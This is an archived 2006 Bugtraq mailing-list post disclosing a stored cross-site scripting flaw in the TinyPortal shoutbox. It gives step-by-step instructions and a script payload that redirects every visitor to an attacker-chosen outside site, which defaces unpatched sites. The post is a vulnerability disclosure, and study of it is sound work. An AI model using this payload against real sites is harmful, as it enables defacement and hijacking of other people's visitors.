lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20060805082202.8854.qmail@securityfocus.com>
Date: 5 Aug 2006 08:22:02 -0000
From: exploitex@...mail.com
To: bugtraq@...urityfocus.com
Subject: Tinyportal Shoutbox

tinyportal has a security  problem and we can defaced  this site.this problem is shoutbox problem.if you  find  tinyportal site with shoutbox with  not installed  neccesary  patch; we could defaced tihs site


We are save to page. (File then save as)

then we are open it file

we look the source then ctrl+h

hidden
text

then save and close and again open.

Look the shoutbox and under the shoutbox 

big a box

and it's under your username and emtpy a box

We write a code big box and your username's box

Code:

<script>location="http://yoursite.com/yourindex.htm"</script>

we are write this code big box(message box) and username's box

and we click to send.

if admin isn't loading the patch.Website is hacked

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ